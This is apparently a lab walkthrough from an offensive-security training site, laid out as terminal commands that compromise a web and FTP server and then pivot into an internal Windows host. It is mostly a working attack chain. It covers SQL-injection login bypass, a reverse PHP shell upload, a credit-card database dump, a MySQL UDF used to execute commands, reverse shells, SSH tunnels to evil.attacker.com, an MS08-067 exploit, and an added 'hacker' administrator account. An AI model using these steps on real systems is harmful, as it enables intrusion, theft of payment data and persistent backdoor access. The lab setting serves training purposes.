Penetration Testing in the real world

Open Terminal A : 
 nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; –
password – 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py –> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; –
password – 1
(logged in as the fifth user)
ls
put rs.php –> (a reverse php shell) Download reverse PHP shell
———————–
Open Terminal B :
nc -lvp 80
———————–
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
———————–
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
————————
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
————————-
Go back to Terminal A :
(inside the ftp server)
put up.html –> (file upload html file)
put up.php — > (file upload php file)
————————-
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
—————————
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
—————————-
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title=”1″ into dumpfile ‘/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title=”2″ into dumpfile ‘/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME ‘lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME ‘lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME ‘lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME ‘lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME ‘lib_mysqludf_sys.so';
SELECT sys_eval(‘chmod 755 /tmp/bd’);
SELECT sys_eval(‘/tmp/bd &’);
(don’t press Enter at this moment)
—————————
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)
—————————-
Open Terminal E :
nc -lvp 80
—————————-
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);
(press enter and we got another reverse shell at Terminal E)
—————————
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
—————————–
Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 –script smb-check-vulns.nse
—————————–
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
——————————
Go back to Terminal F :
cd core
nano nx.py –> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add
———————————
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
———————————–
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username – hacker and password – hacker)

Leave a Reply